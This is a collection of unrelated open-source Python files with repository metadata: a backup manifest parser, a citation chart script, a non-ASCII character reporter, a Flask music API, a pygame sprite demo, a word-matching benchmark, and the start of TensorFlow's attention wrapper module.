parse_fileinfo(line): fileinfo = line.strip().split() return (fileinfo[0], ''.join(fileinfo[1:])) self.files_changed = list(map(parse_fileinfo, match.group(3).split('\n'))) assert filecount == len(self.files_changed) next_vi_string_regexp = re.compile("(^|\\n)(volume\\s.*?)" "(\\nvolume\\s|$)", re.I | re.S) starting_s_index = 0 highest_vol = 0 latest_vol = 0 while 1: match = next_vi_string_regexp.search(s[starting_s_index:]) if not match: break vi = VolumeInfo().from_string(match.group(2)) self.add_volume_info(vi) highest_vol = max(highest_vol, vi.volume_number) latest_vol = vi.volume_number starting_s_index += match.end(2) # If we restarted after losing some remote volumes, the highest volume # seen may be higher than the last volume recorded. That is, the # manifest could contain "vol1, vol2, vol3, vol2." If so, we don't # want to keep vol3's info. 
for i in range(latest_vol + 1, highest_vol + 1): self.del_volume_info(i) return self def get_files_changed(self): return self.files_changed def __eq__(self, other): """ Two manifests are equal if they contain the same volume infos """ vi_list1 = self.volume_info_dict.keys() vi_list1.sort() vi_list2 = other.volume_info_dict.keys() vi_list2.sort() if vi_list1 != vi_list2: log.Notice(_("Manifests not equal because different volume numbers")) return False for i in range(len(vi_list1)): if not vi_list1[i] == vi_list2[i]: log.Notice(_("Manifests not equal because volume lists differ")) return False if (self.hostname != other.hostname or self.local_dirname != other.local_dirname): log.Notice(_("Manifests not equal because hosts or directories differ")) return False return True def __ne__(self, other): """ Defines !=. Not doing this always leads to annoying bugs... """ return not self.__eq__(other) def write_to_path(self, path): """ Write string version of manifest to given path """ assert not path.exists() fout = path.open("wb") fout.write(self.to_string()) assert not fout.close() path.setdata() def get_containing_volumes(self, index_prefix): """ Return list of volume numbers that may contain index_prefix """ return filter(lambda vol_num: self.volume_info_dict[vol_num].contains(index_prefix), self.volume_info_dict.keys()) class VolumeInfoError(Exception): """ Raised when there is a problem initializing a VolumeInfo from string """ pass class VolumeInfo: """ Information about a single volume """ def __init__(self): """VolumeInfo initializer""" self.volume_number = None self.start_index = None self.start_block = None self.end_index = None self.end_block = None self.hashes = {} def set_info(self, vol_number, start_index, start_block, end_index, end_block): """ Set essential VolumeInfo information, return self Call with starting and ending paths stored in the volume. If a multivol diff gets split between volumes, count it as being part of both volumes. """ self.volume_number = vol_number self.start_index = start_index self.start_block = start_block self.end_index = end_index self.end_block = end_block return self def set_hash(self, hash_name, data): """ Set the value of hash hash_name (e.g. "MD5") to data """ self.hashes[hash_name] = data def get_best_hash(self): """ Return pair (hash_type, hash_data) SHA1 is the best hash, and MD5 is the second best hash. None is returned if no hash is available. """ if not self.hashes: return None try: return ("SHA1", self.hashes['SHA1']) except KeyError: pass try: return ("MD5", self.hashes['MD5']) except KeyError: pass return self.hashes.items()[0] def to_string(self): """ Return nicely formatted string reporting all information """ def index_to_string(index): """Return printable version of index without any whitespace""" if index: s = "/".join(index) return Quote(s) else: return "." 
slist = ["Volume %d:" % self.volume_number] whitespace = " " slist.append("%sStartingPath %s %s" % (whitespace, index_to_string(self.start_index), (self.start_block or " "))) slist.append("%sEndingPath %s %s" % (whitespace, index_to_string(self.end_index), (self.end_block or " "))) for key in self.hashes: slist.append("%sHash %s %s" % (whitespace, key, self.hashes[key])) return "\n".join(slist) __str__ = to_string def from_string(self, s): """ Initialize self from string s as created by to_string """ def string_to_index(s): """ Return tuple index from string """ s = Unquote(s) if s == ".": return () return tuple(s.split("/")) linelist = s.strip().split("\n") # Set volume number m = re.search("^Volume ([0-9]+):", linelist[0], re.I) if not m: raise VolumeInfoError("Bad first line '%s'" % (linelist[0],)) self.volume_number = int(m.group(1)) # Set other fields for line in linelist[1:]: if not line: continue line_split = line.strip().split() field_name = line_split[0].lower() other_fields = line_split[1:] if field_name == "Volume": log.Warn(_("Warning, found extra Volume identifier")) break elif field_name == "startingpath": self.start_index = string_to_index(other_fields[0]) if len(other_fields) > 1: self.start_block = int(other_fields[1]) else: self.start_block = None elif field_name == "endingpath": self.end_index = string_to_index(other_fields[0]) if len(other_fields) > 1: self.end_block = int(other_fields[1]) else: self.end_block = None elif field_name == "hash": self.set_hash(other_fields[0], other_fields[1]) if self.start_index is None or self.end_index is None: raise VolumeInfoError("Start or end index not set") return self def __eq__(self, other): """ Used in test suite """ if not isinstance(other, VolumeInfo): log.Notice(_("Other is not VolumeInfo")) return None if self.volume_number != other.volume_number: log.Notice(_("Volume numbers don't match")) return None if self.start_index != other.start_index: log.Notice(_("start_indicies don't match")) return None if self.end_index != other.end_index: log.Notice(_("end_index don't match")) return None hash_list1 = self.hashes.items() hash_list1.sort() hash_list2 = other.hashes.items() hash_list2.sort() if hash_list1 != hash_list2: log.Notice(_("Hashes don't match")) return None return 1 def __ne__(self, other): """ Defines != """ return not self.__eq__(other) def contains(self, index_prefix, recursive=1): """ Return true if volume might contain index If recursive is true, then return true if any index starting with index_prefix could be contained. Otherwise, just check if index_prefix itself is between starting and ending indicies. 
""" if recursive: return (self.start_index[:len(index_prefix)] <= index_prefix <= self.end_index) else: return self.start_index <= index_prefix <= self.end_index nonnormal_char_re = re.compile("(\\s|[\\\\\"'])") def Quote(s): """ Return quoted version of s safe to put in a manifest or volume info """ if not nonnormal_char_re.search(s): return s # no quoting necessary slist = [] for char in s: if nonnormal_char_re.search(char): slist.append("\\x%02x" % ord(char)) else: slist.append(char) return '"%s"' % "".join(slist) def Unquote(quoted_string): """ Return original string from quoted_string produced by above """ if not quoted_string[0] == '"' or quoted_string[0] == "'": return quoted_string assert quoted_string[0] == quoted_string[-1] return_list = [] i = 1 # skip initial char while i < len(quoted_string) - 1: char = quoted_string[i] if char == "\\": # quoted section assert quoted_string[i + 1] == "x" return_list.append(chr(int(quoted_string[i + 2:i + 4], 16))) i += 4 else: return_list.append(char) i += 1 return "".join(return_list)
gpl-2.0
-1,987,972,922,932,362,800
32.183794
128
0.546602
false
4.071532
false
false
false
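Quote() and Unquote() at the end of manifest.py above escape whitespace, quotes and backslashes as \xHH inside a double-quoted string; a quick round-trip sketch, assuming the two functions are imported from the module above:

quoted = Quote("my file.txt")
print(quoted)           # "my\x20file.txt"  (space escaped, wrapped in double quotes)
print(Unquote(quoted))  # my file.txt
print(Quote("plain"))   # plain  (no special characters, returned unchanged)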
karpeev/libmesh
doc/statistics/libmesh_citations.py
1
2340
#!/usr/bin/env python import matplotlib.pyplot as plt import numpy as np # Number of "papers using libmesh" by year. # # Note 1: this does not count citations "only," the authors must have actually # used libmesh in part of their work. Therefore, these counts do not include # things like Wolfgang citing us in his papers to show how Deal.II is # superior... # # Note 2: I typically update this data after regenerating the web page, # since bibtex2html renumbers the references starting from "1" each year. # # Note 3: These citations include anything that is not a dissertation/thesis. # So, some are conference papers, some are journal articles, etc. # # Note 4: The libmesh paper came out in 2006, but there are some citations # prior to that date, obviously. These counts include citations of the # website libmesh.sf.net as well... # # Note 5: Preprints are listed as the "current year + 1" and are constantly # being moved to their respective years after being published. data = [ '2004', 5, '\'05', 2, '\'06', 13, '\'07', 8, '\'08', 23, '\'09', 30, '\'10', 24, '\'11', 37, '\'12', 50, '\'13', 78, '\'14', 62, '\'15', 24, 'P', 5, # Preprints 'T', 38 # Theses ] # Extract the x-axis labels from the data array xlabels = data[0::2] # Extract the publication counts from the data array n_papers = data[1::2] # The number of data points N = len(xlabels); # Get a reference to the figure fig = plt.figure() # 111 is equivalent to Matlab's subplot(1,1,1) command ax = fig.add_subplot(111) # Create an x-axis for plotting x = np.linspace(1, N, N) # Width of the bars width = 0.8 # Make the bar chart. Plot years in blue, preprints and theses in green. ax.bar(x[0:N-2], n_papers[0:N-2], width, color='b') ax.bar(x[N-2:N], n_papers[N-2:N], width, color='g') # Label the x-axis plt.xlabel('P=Preprints, T=Theses') # Set up the xtick locations and labels. Note that you have to offset # the position of the ticks by width/2, where width is the width of # the bars. ax.set_xticks(np.linspace(1,N,N) + width/2) ax.set_xticklabels(xlabels) # Create a title string title_string = 'LibMesh Citations, (' + str(sum(n_papers)) + ' Total)' fig.suptitle(title_string) # Save as PDF plt.savefig('libmesh_citations.pdf') # Local Variables: # python-indent: 2 # End:
lgpl-2.1
-5,032,296,851,778,894,000
26.529412
78
0.674359
false
2.962025
false
false
false
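The citation script above stores year labels and paper counts in one interleaved list and splits them with extended slices; the slicing it relies on, in isolation:

data = ['2004', 5, "'05", 2, "'06", 13]  # shortened copy of the list above
labels = data[0::2]   # ['2004', "'05", "'06"]
counts = data[1::2]   # [5, 2, 13]
print(labels, counts, sum(counts))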
meisterluk/print-nonascii.py
printnonascii/char.py
1
2308
#!/usr/bin/env python3 class Character: def __init__(self, c): self.character = c self.unicode_point = None self.lineno = None self.colno = None self.category = None self.description = None self.line = None def asciionly(self): assert self.description or self.unicode_point if self.description is not None and self.unicode_point is not None: out = '{} {}'.format(self.unicode_point, self.description) elif self.description: out = '{}'.format(self.description) elif self.unicode_point is not None: out = '{}'.format(self.unicode_point) if self.category is not None: out += ' of category {}'.format(self.category) if self.lineno is not None: out += ' at line {}'.format(self.lineno) elif self.colno is not None: out += ' at column {}'.format(self.colno) return out @staticmethod def make_pointer(line, colno): out = '' for idx in range(len(line)): if idx == colno: break elif line[idx] == '\t': out += '\t' else: out += '─' return out + '⬏' def __str__(self): out = '' if self.line is not None and self.colno is not None: leading_ws = max(len(str(self.lineno)), 3) tmpl = '{: <' + str(leading_ws) + 'd}: {}' out += tmpl.format(self.lineno, self.line) out += ' ' * leading_ws + ': ' out += self.make_pointer(self.line, self.colno) out += '\n\n' out += "{} ".format(self.character) if self.unicode_point: out += '{} '.format(self.unicode_point) if self.lineno is not None and self.colno is not None: out += '(line {}, col {})'.format(self.lineno, self.colno) elif self.lineno is not None: out += '(line {})'.format(self.lineno) elif self.colno is not None: out += '(col {})'.format(self.colno) out += "\n" if self.category: out += " category: {}\n".format(self.category) out += " name: {}\n".format(self.description) out += "\n" return out
bsd-3-clause
-7,909,865,003,349,707,000
30.135135
75
0.503906
false
3.891892
false
false
false
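The Character class above is populated field by field before being printed; a small usage sketch (values filled in by hand here, whereas the real tool derives them from a scanned file):

c = Character("é")
c.unicode_point = "U+00E9"
c.category = "Ll"
c.description = "LATIN SMALL LETTER E WITH ACUTE"
c.lineno, c.colno = 1, 3
c.line = "café au lait"

print(c)              # report with the offending line and a pointer to column 3
print(c.asciionly())  # one-line ASCII-only summary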
building4theweb/soundem-api
soundem/views.py
1
5875
from flask import g, jsonify, request, abort from flask_cors import cross_origin from soundem import app from .decorators import auth_token_required from .models import Artist, Album, Song, User @app.route('/api/v1/login', methods=['POST']) @cross_origin(headers=['Content-Type', 'Authorization']) def login(): data = request.get_json() or {} email = data.get('email') password = data.get('password') errors = {} if not email: errors['email'] = 'Field is required.' if not password: errors['password'] = 'Field is required.' user = User.find_by_email(email) if not user: errors['email'] = 'User does not exist.' elif not user.check_password(password): errors['password'] = 'Invalid password.' if errors: return jsonify({'errors': errors}), 400 user_data = { 'id': user.id, 'email': user.email, 'token': user.get_auth_token() } return jsonify({'user': user_data}) @app.route('/api/v1/register', methods=['POST']) @cross_origin(headers=['Content-Type', 'Authorization']) def register(): data = request.get_json() or {} email = data.get('email') password = data.get('password') errors = {} if not email: errors['email'] = 'Field is required.' if not password: errors['password'] = 'Field is required.' existing_user = User.find_by_email(email) if existing_user: errors['email'] = 'Email is already taken' if errors: return jsonify({'errors': errors}), 400 user = User.create(email=email, password=password) user_data = { 'id': user.id, 'email': user.email, 'token': user.get_auth_token() } return jsonify({'user': user_data}), 201 @app.route('/api/v1/artists', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_artists(): artists_results = [] for artist in Artist.get_all(): artists_results.append({ 'id': artist.id, 'name': artist.name, 'bio': artist.bio, 'albums': [album.id for album in artist.albums.all()] }) return jsonify({'artists': artists_results}) @app.route('/api/v1/artists/<int:artist_id>', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_artist(artist_id): artist = Artist.get(artist_id) if not artist: abort(404) artist_data = { 'id': artist.id, 'name': artist.name, 'bio': artist.bio, 'albums': [album.id for album in artist.albums.all()] } return jsonify({'artist': artist_data}) @app.route('/api/v1/albums', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_albums(): albums_results = [] for album in Album.get_all(): albums_results.append({ 'id': album.id, 'name': album.name, 'artworkURL': album.artwork_url, 'artist': album.artist_id, 'songs': [song.id for song in album.songs.all()] }) return jsonify({'albums': albums_results}) @app.route('/api/v1/albums/<int:album_id>', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_album(album_id): album = Album.get(album_id) if not album: abort(404) album_data = { 'id': album.id, 'name': album.name, 'artworkURL': album.artwork_url, 'artist': album.artist_id, 'songs': [song.id for song in album.songs.all()] } return jsonify({'album': album_data}) @app.route('/api/v1/songs', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_songs(): songs_results = [] favorite = request.args.get('favorite') song_ids = request.args.getlist('ids[]') if favorite == 'true': songs = Song.get_favorites(g.user) elif song_ids: songs = Song.filter_by_ids(song_ids) else: songs = Song.get_all() for song in songs: songs_results.append({ 'id': 
song.id, 'name': song.name, 'album': song.album.id, 'favorite': song.is_favorited(g.user), 'duration': song.duration, 'url': song.url }) return jsonify({'songs': songs_results}) @app.route('/api/v1/songs/<int:song_id>', methods=['GET', 'PUT']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def song(song_id): song = Song.get(song_id) is_favorited = None if not song: abort(404) if request.method == 'PUT': data = request.get_json() or {} data_song = data.get('song') or {} favorite = data_song.get('favorite') if favorite is not None: # Update song if favorite param was sent is_favorited = song.set_favorite(g.user, favorite) else: song = Song.get(song_id) if is_favorited is None: # Check if song was favorited is_favorited = song.is_favorited(g.user) song_data = { 'id': song.id, 'name': song.name, 'album': song.album.id, 'favorite': is_favorited, 'duration': song.duration, 'url': song.url } return jsonify({'song': song_data}) @app.route('/api/v1/users/<int:user_id>', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def user(user_id): user = g.user if user.id != user_id: abort(403) user_data = { 'id': user.id, 'email': user.email, 'songTotal': Song.total_count(), 'albumTotal': Album.total_count(), 'durationTotal': Song.total_duration() } return jsonify({'user': user_data})
mit
6,891,862,848,539,757,000
24.323276
65
0.584
false
3.459953
false
false
false
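The login view above accepts a JSON body and returns the user's API token; a client-side sketch using the requests library (the host, email and password are placeholders, and the exact Authorization header format depends on the auth_token_required decorator, which is not shown here):

import requests

resp = requests.post(
    "http://localhost:5000/api/v1/login",
    json={"email": "user@example.com", "password": "secret"},
)
if resp.status_code == 200:
    token = resp.json()["user"]["token"]
    # The token would then accompany later requests, e.g. to /api/v1/songs.
else:
    print(resp.json()["errors"])  # field-level validation messages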
notkarol/banjin
experiment/python_word_matching_speed.py
1
4650
#!/usr/bin/python # Takes in a dictionary of words # Verifies that all functions return the same answers # Generates random hands from the probability of getting tiles from the bunch # Then prints out how long each function takes to find all matching words # Generates various hand sizes to see if there's any scaling import matplotlib.pyplot as plt import numpy as np import pickle import os import sys import timeit # Naive list way of matching wordbank def f0_list(hand, wordbank): results = [] for w_i in range(len(wordbank)): match = True for i in range(26): if hand[i] < wordbank[w_i][i]: match = False break if match: results.append(w_i) return results # A for loop and some numpy def f1_list(hand, wordbank): results = [] for w_i in range(len(wordbank)): if min(list(map(lambda x: x[1] - x[0], zip(wordbank[w_i], hand)))) >= 0: results.append(w_i) return results # Naive way using numpy def f0_np(hand, wordbank): results = [] for w_i in range(len(wordbank)): match = True for i in range(26): if hand[i] < wordbank[w_i,i]: match = False break if match: results.append(w_i) return results # A for loop and some numpy def f1_np(hand, wordbank): results = [] for w_i in range(len(wordbank)): if not np.any((hand - wordbank[w_i]) < 0): results.append(w_i) return results # A for loop and some numpy def f2_np(hand, wordbank): results = [] for w_i in range(len(wordbank)): if np.min(hand - wordbank[w_i]) >= 0: results.append(w_i) return results # Vectorized sum and difference def f3_np(hand, wordbank): return np.where(np.sum((wordbank - hand) > 0, axis=1) == 0)[0] # vectorized just using any def f4_np(hand, wordbank): return np.where(np.any(wordbank > hand, axis=1) == 0)[0] # Prepare a 2D list and a 2D np array of letter frequencies with open(sys.argv[1]) as f: words = [x.split()[0] for x in f.readlines()] wordbank_list = [[0] * 26 for _ in range(len(words))] wordbank_np = np.zeros((len(words), 26)) for w_i in range(len(words)): for letter in sorted(words[w_i]): pos = ord(letter) - 65 wordbank_list[w_i][pos] += 1 wordbank_np[w_i][pos] += 1 # Arrays for keeping track of functions and data-specific wordbanks hand_sizes = list(range(2, 9)) functions = {'list' : [f0_list, f1_list], 'numpy': [f0_np, f1_np, f2_np, f3_np, f4_np]} wordbanks = {'list' : wordbank_list, 'numpy': wordbank_np} n_iter = 10 if len(sys.argv) < 3 else int(sys.argv[2]) timings = {} for datatype in functions: timings[datatype] = np.zeros((max(hand_sizes) + 1, n_iter, len(functions[datatype]))) # Verify that our functions give the same answers for datatype in functions: for func in functions[datatype]: print(datatype, func(wordbanks[datatype][len(wordbank_list) // 2], wordbanks[datatype])) # Time each word imports = 'from __main__ import functions, wordbanks' for counter in range(n_iter): for hand_size in hand_sizes: # Get a specific hand size hand = [13,3,3,6,18,3,4,3,12,2,2,5,3,8,11,3,2,9,6,9,6,3,3,2,3,2] while sum(hand) > hand_size: pos = np.random.randint(sum(hand)) for i in range(len(hand)): pos -= hand[i] if pos < 0: hand[i] -= 1 break hand = str(hand) # For this hand go wild for datatype in functions: for f_i in range(len(functions[datatype])): cmd = 'functions["%s"][%i](%s, wordbanks["%s"])' % (datatype, f_i, hand, datatype) timings[datatype][hand_size, counter, f_i] += timeit.timeit(cmd, imports, number=8) print("\rCompleted %.1f%%" % (100 * (counter + 1) / n_iter), end='') print() # Save words and timings in case we're doing a long-lasting operation filename = 'word_matching_timings_%s.pkl' % os.path.basename(sys.argv[1]) with 
open(filename, 'wb') as f: print("Saving", filename) pickle.dump((words, wordbanks, timings), f) # Show Results for datatype in functions: means = np.mean(timings[datatype], axis=1) for f_i in range(means.shape[1]): plt.semilogy(hand_sizes, means[:, f_i][min(hand_sizes):], label='%s F%i' % (datatype, f_i)) plt.legend(loc='center left', bbox_to_anchor=(0.85, 0.5)) plt.xlabel("Hand Size") plt.ylabel("Execution Time") plt.title("Word Matching") plt.show()
mit
6,223,729,968,353,600,000
29.794702
99
0.60043
false
3.144016
false
false
false
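The fastest matcher above, f4_np, keeps exactly those words whose per-letter counts never exceed the hand's; the same trick on a toy three-letter alphabet:

import numpy as np

# Letter-count vectors over a toy alphabet (a, b, c).
wordbank = np.array([[1, 0, 1],   # "ac"
                     [2, 1, 0],   # "aab"
                     [0, 0, 2]])  # "cc"
hand = np.array([2, 1, 1])        # tiles available: a, a, b, c

# A word matches when no letter requirement exceeds what the hand holds.
matches = np.where(np.any(wordbank > hand, axis=1) == 0)[0]
print(matches)  # [0 1] -> "ac" and "aab" can be formed, "cc" cannot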
asweigart/pyganim
examples/sprite_sheet_demo.py
1
1276
# trex image from Wyverii on http://opengameart.org/content/unsealed-terrex import sys import os sys.path.append(os.path.abspath('..')) import pygame from pygame.locals import * import pyganim pygame.init() # set up the window windowSurface = pygame.display.set_mode((320, 240), 0, 32) pygame.display.set_caption('Sprite Sheet Demo') # create the animation objects rects = [( 0, 154, 94, 77), ( 94, 154, 94, 77), (188, 154, 94, 77), (282, 154, 94, 77), (376, 154, 94, 77), (470, 154, 94, 77), (564, 154, 94, 77), (658, 154, 94, 77), (752, 154, 94, 77),] allImages = pyganim.getImagesFromSpriteSheet('terrex_0.png', rects=rects) frames = list(zip(allImages, [100] * len(allImages))) dinoAnim = pyganim.PygAnimation(frames) dinoAnim.play() # there is also a pause() and stop() method mainClock = pygame.time.Clock() BGCOLOR = (100, 50, 50) while True: windowSurface.fill(BGCOLOR) for event in pygame.event.get(): if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE): pygame.quit() sys.exit() dinoAnim.blit(windowSurface, (100, 50)) pygame.display.update() mainClock.tick(30) # Feel free to experiment with any FPS setting.
bsd-3-clause
-1,025,960,563,565,159,800
27.377778
83
0.633229
false
3.097087
false
false
false
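The nine sprite-sheet rects in the demo above all share the same 94x77 size and differ only in their x offset, so the list could equally be generated:

rects = [(94 * i, 154, 94, 77) for i in range(9)]  # same rectangles as the literal list above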
Xeralux/tensorflow
tensorflow/contrib/seq2seq/python/ops/attention_wrapper.py
1
59833
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """A powerful dynamic attention wrapper object.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import functools import math import numpy as np from tensorflow.contrib.framework.python.framework import tensor_util from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_shape from tensorflow.python.layers import base as layers_base from tensorflow.python.layers import core as layers_core from tensorflow.python.ops import array_ops from tensorflow.python.ops import check_ops from tensorflow.python.ops import clip_ops from tensorflow.python.ops import functional_ops from tensorflow.python.ops import init_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import nn_ops from tensorflow.python.ops import random_ops from tensorflow.python.ops import rnn_cell_impl from tensorflow.python.ops import tensor_array_ops from tensorflow.python.ops import variable_scope from tensorflow.python.util import nest __all__ = [ "AttentionMechanism", "AttentionWrapper", "AttentionWrapperState", "LuongAttention", "BahdanauAttention", "hardmax", "safe_cumprod", "monotonic_attention", "BahdanauMonotonicAttention", "LuongMonotonicAttention", ] _zero_state_tensors = rnn_cell_impl._zero_state_tensors # pylint: disable=protected-access class AttentionMechanism(object): @property def alignments_size(self): raise NotImplementedError @property def state_size(self): raise NotImplementedError def _prepare_memory(memory, memory_sequence_length, check_inner_dims_defined): """Convert to tensor and possibly mask `memory`. Args: memory: `Tensor`, shaped `[batch_size, max_time, ...]`. memory_sequence_length: `int32` `Tensor`, shaped `[batch_size]`. check_inner_dims_defined: Python boolean. If `True`, the `memory` argument's shape is checked to ensure all but the two outermost dimensions are fully defined. Returns: A (possibly masked), checked, new `memory`. Raises: ValueError: If `check_inner_dims_defined` is `True` and not `memory.shape[2:].is_fully_defined()`. 
""" memory = nest.map_structure( lambda m: ops.convert_to_tensor(m, name="memory"), memory) if memory_sequence_length is not None: memory_sequence_length = ops.convert_to_tensor( memory_sequence_length, name="memory_sequence_length") if check_inner_dims_defined: def _check_dims(m): if not m.get_shape()[2:].is_fully_defined(): raise ValueError("Expected memory %s to have fully defined inner dims, " "but saw shape: %s" % (m.name, m.get_shape())) nest.map_structure(_check_dims, memory) if memory_sequence_length is None: seq_len_mask = None else: seq_len_mask = array_ops.sequence_mask( memory_sequence_length, maxlen=array_ops.shape(nest.flatten(memory)[0])[1], dtype=nest.flatten(memory)[0].dtype) seq_len_batch_size = ( memory_sequence_length.shape[0].value or array_ops.shape(memory_sequence_length)[0]) def _maybe_mask(m, seq_len_mask): rank = m.get_shape().ndims rank = rank if rank is not None else array_ops.rank(m) extra_ones = array_ops.ones(rank - 2, dtype=dtypes.int32) m_batch_size = m.shape[0].value or array_ops.shape(m)[0] if memory_sequence_length is not None: message = ("memory_sequence_length and memory tensor batch sizes do not " "match.") with ops.control_dependencies([ check_ops.assert_equal( seq_len_batch_size, m_batch_size, message=message)]): seq_len_mask = array_ops.reshape( seq_len_mask, array_ops.concat((array_ops.shape(seq_len_mask), extra_ones), 0)) return m * seq_len_mask else: return m return nest.map_structure(lambda m: _maybe_mask(m, seq_len_mask), memory) def _maybe_mask_score(score, memory_sequence_length, score_mask_value): if memory_sequence_length is None: return score message = ("All values in memory_sequence_length must greater than zero.") with ops.control_dependencies( [check_ops.assert_positive(memory_sequence_length, message=message)]): score_mask = array_ops.sequence_mask( memory_sequence_length, maxlen=array_ops.shape(score)[1]) score_mask_values = score_mask_value * array_ops.ones_like(score) return array_ops.where(score_mask, score, score_mask_values) class _BaseAttentionMechanism(AttentionMechanism): """A base AttentionMechanism class providing common functionality. Common functionality includes: 1. Storing the query and memory layers. 2. Preprocessing and storing the memory. """ def __init__(self, query_layer, memory, probability_fn, memory_sequence_length=None, memory_layer=None, check_inner_dims_defined=True, score_mask_value=None, name=None): """Construct base AttentionMechanism class. Args: query_layer: Callable. Instance of `tf.layers.Layer`. The layer's depth must match the depth of `memory_layer`. If `query_layer` is not provided, the shape of `query` must match that of `memory_layer`. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. probability_fn: A `callable`. Converts the score and previous alignments to probabilities. Its signature should be: `probabilities = probability_fn(score, state)`. memory_sequence_length (optional): Sequence lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. memory_layer: Instance of `tf.layers.Layer` (may be None). The layer's depth must match the depth of `query_layer`. If `memory_layer` is not provided, the shape of `memory` must match that of `query_layer`. check_inner_dims_defined: Python boolean. If `True`, the `memory` argument's shape is checked to ensure all but the two outermost dimensions are fully defined. 
score_mask_value: (optional): The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. name: Name to use when creating ops. """ if (query_layer is not None and not isinstance(query_layer, layers_base.Layer)): raise TypeError( "query_layer is not a Layer: %s" % type(query_layer).__name__) if (memory_layer is not None and not isinstance(memory_layer, layers_base.Layer)): raise TypeError( "memory_layer is not a Layer: %s" % type(memory_layer).__name__) self._query_layer = query_layer self._memory_layer = memory_layer self.dtype = memory_layer.dtype if not callable(probability_fn): raise TypeError("probability_fn must be callable, saw type: %s" % type(probability_fn).__name__) if score_mask_value is None: score_mask_value = dtypes.as_dtype( self._memory_layer.dtype).as_numpy_dtype(-np.inf) self._probability_fn = lambda score, prev: ( # pylint:disable=g-long-lambda probability_fn( _maybe_mask_score(score, memory_sequence_length, score_mask_value), prev)) with ops.name_scope( name, "BaseAttentionMechanismInit", nest.flatten(memory)): self._values = _prepare_memory( memory, memory_sequence_length, check_inner_dims_defined=check_inner_dims_defined) self._keys = ( self.memory_layer(self._values) if self.memory_layer # pylint: disable=not-callable else self._values) self._batch_size = ( self._keys.shape[0].value or array_ops.shape(self._keys)[0]) self._alignments_size = (self._keys.shape[1].value or array_ops.shape(self._keys)[1]) @property def memory_layer(self): return self._memory_layer @property def query_layer(self): return self._query_layer @property def values(self): return self._values @property def keys(self): return self._keys @property def batch_size(self): return self._batch_size @property def alignments_size(self): return self._alignments_size @property def state_size(self): return self._alignments_size def initial_alignments(self, batch_size, dtype): """Creates the initial alignment values for the `AttentionWrapper` class. This is important for AttentionMechanisms that use the previous alignment to calculate the alignment at the next time step (e.g. monotonic attention). The default behavior is to return a tensor of all zeros. Args: batch_size: `int32` scalar, the batch_size. dtype: The `dtype`. Returns: A `dtype` tensor shaped `[batch_size, alignments_size]` (`alignments_size` is the values' `max_time`). """ max_time = self._alignments_size return _zero_state_tensors(max_time, batch_size, dtype) def initial_state(self, batch_size, dtype): """Creates the initial state values for the `AttentionWrapper` class. This is important for AttentionMechanisms that use the previous alignment to calculate the alignment at the next time step (e.g. monotonic attention). The default behavior is to return the same output as initial_alignments. Args: batch_size: `int32` scalar, the batch_size. dtype: The `dtype`. Returns: A structure of all-zero tensors with shapes as described by `state_size`. """ return self.initial_alignments(batch_size, dtype) def _luong_score(query, keys, scale): """Implements Luong-style (multiplicative) scoring function. This attention has two forms. The first is standard Luong attention, as described in: Minh-Thang Luong, Hieu Pham, Christopher D. Manning. "Effective Approaches to Attention-based Neural Machine Translation." EMNLP 2015. https://arxiv.org/abs/1508.04025 The second is the scaled form inspired partly by the normalized form of Bahdanau attention. 
To enable the second form, call this function with `scale=True`. Args: query: Tensor, shape `[batch_size, num_units]` to compare to keys. keys: Processed memory, shape `[batch_size, max_time, num_units]`. scale: Whether to apply a scale to the score function. Returns: A `[batch_size, max_time]` tensor of unnormalized score values. Raises: ValueError: If `key` and `query` depths do not match. """ depth = query.get_shape()[-1] key_units = keys.get_shape()[-1] if depth != key_units: raise ValueError( "Incompatible or unknown inner dimensions between query and keys. " "Query (%s) has units: %s. Keys (%s) have units: %s. " "Perhaps you need to set num_units to the keys' dimension (%s)?" % (query, depth, keys, key_units, key_units)) dtype = query.dtype # Reshape from [batch_size, depth] to [batch_size, 1, depth] # for matmul. query = array_ops.expand_dims(query, 1) # Inner product along the query units dimension. # matmul shapes: query is [batch_size, 1, depth] and # keys is [batch_size, max_time, depth]. # the inner product is asked to **transpose keys' inner shape** to get a # batched matmul on: # [batch_size, 1, depth] . [batch_size, depth, max_time] # resulting in an output shape of: # [batch_size, 1, max_time]. # we then squeeze out the center singleton dimension. score = math_ops.matmul(query, keys, transpose_b=True) score = array_ops.squeeze(score, [1]) if scale: # Scalar used in weight scaling g = variable_scope.get_variable( "attention_g", dtype=dtype, initializer=1.) score = g * score return score class LuongAttention(_BaseAttentionMechanism): """Implements Luong-style (multiplicative) attention scoring. This attention has two forms. The first is standard Luong attention, as described in: Minh-Thang Luong, Hieu Pham, Christopher D. Manning. "Effective Approaches to Attention-based Neural Machine Translation." EMNLP 2015. https://arxiv.org/abs/1508.04025 The second is the scaled form inspired partly by the normalized form of Bahdanau attention. To enable the second form, construct the object with parameter `scale=True`. """ def __init__(self, num_units, memory, memory_sequence_length=None, scale=False, probability_fn=None, score_mask_value=None, dtype=None, name="LuongAttention"): """Construct the AttentionMechanism mechanism. Args: num_units: The depth of the attention mechanism. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. memory_sequence_length: (optional) Sequence 